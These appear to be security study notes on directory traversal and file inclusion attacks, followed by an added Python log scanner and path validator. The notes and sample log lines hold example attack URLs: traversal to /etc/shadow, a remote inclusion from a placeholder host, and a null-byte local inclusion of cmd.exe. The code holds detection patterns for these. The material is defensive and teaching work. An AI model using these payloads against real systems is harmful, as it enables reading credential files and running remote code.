- An injection attack occurs when the attacker inserts malicious code through an application interface
- Directory traversal: an application attack that allows access to commands, files, and directories that may or may not be located under the web document root directory
**<http://cat-bounce.com/../../../../etc/shadow>**
Unix systems use **../**
Windows systems use **..\\** by default but may also accept the Unix-like **../**
- Directory traversals may be used to access any file on a system with the right permissions
- Attackers may use URL encoding to hide directory traversal attempts (%2e%2e%2f represents ../)
File Inclusion
- Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor
Remote File Inclusion
- An attacker executes a script to inject a remote file into the web app or website
<https://cat-bounce.com/login.php?user=http://malware.bad/malicious.php>
Local File Inclusion
- An attacker adds a file to the web app or website that already exists on the hosting server
<https://cat-bounce.com/login.php?user=../../Windows/System32/cmd.exe%00>
- Log entries containing ../ (or its encoded form) indicate directory traversal attempts
To prevent directory traversal and file inclusion attacks, use proper input validation: canonicalize the user-supplied path and reject anything that resolves outside the intended directory
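The two defensive points in these notes, spotting traversal and inclusion attempts in logs and validating file paths before use, as an added example that is not part of the original notes. The access-log lines are constructed samples (documentation-range IPs; `malware.bad` is the placeholder host from the notes), and `/var/www/html` is an assumed document root; the detector decodes percent-encoding repeatedly so double encoding is also caught, treats `..\` like `../`, and flags a remote URL in a query parameter as a remote file inclusion attempt.

```python
"""
Added example (not from the original notes): detect directory traversal and
file inclusion attempts in web access logs, and validate user-supplied paths
so they cannot escape the document root. All sample data is constructed.
"""
import re
from pathlib import Path
from urllib.parse import unquote

# Constructed sample log lines (Common Log Format); only the request target matters here.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /../../../../etc/shadow HTTP/1.1" 403 0
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "GET /%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1" 403 0
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /login.php?user=http://malware.bad/malicious.php HTTP/1.1" 200 77
203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "GET /login.php?user=..%5c..%5cWindows/System32/cmd.exe%00 HTTP/1.1" 500 0
203.0.113.2 - - [10/Oct/2023:13:56:10 +0000] "GET /images/cat.png HTTP/1.1" 200 9120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/')
RFI_RE = re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.IGNORECASE)


def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so double encoding (e.g. %252e) is also unwrapped."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return the list of indicator names found in one request target."""
    decoded = decode_fully(target)
    normalized = decoded.replace("\\", "/")  # treat Windows ..\ like Unix ../
    findings = []
    if "../" in normalized:
        findings.append("directory_traversal")
        if decoded != target:  # traversal was hidden behind percent-encoding
            findings.append("encoded")
    if RFI_RE.search(decoded):  # a query parameter pointing at a remote file
        findings.append("remote_file_inclusion")
    if "\x00" in decoded:  # null byte used to cut off an appended extension
        findings.append("null_byte")
    return findings


def scan_log(text):
    """Return (line_number, request_target, findings) for every suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group(1))
        if findings:
            hits.append((n, m.group(1), findings))
    return hits


def resolve_within(document_root, user_path):
    """
    Input-validation side: canonicalize a user-supplied file name and return its
    path relative to document_root, or None if it would escape the root.
    A leading slash is treated as relative to the root, not as an absolute path.
    """
    root = Path(document_root).resolve()
    decoded = decode_fully(user_path).replace("\\", "/")
    if "\x00" in decoded:
        return None
    candidate = (root / decoded.lstrip("/")).resolve()
    try:
        return candidate.relative_to(root).as_posix()
    except ValueError:  # resolved outside the document root
        return None


if __name__ == "__main__":
    for line_no, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {findings} <- {target}")
    for p in ("images/cat.png", "../../../../etc/shadow", "%2e%2e%2fetc/passwd"):
        print(f"{p!r} -> {resolve_within('/var/www/html', p)!r}")
```

`scan_log` is a triage aid, not a replacement for server-side validation: `resolve_within` shows the check the application itself should make, accepting a path only when its canonical form still lies under the document root.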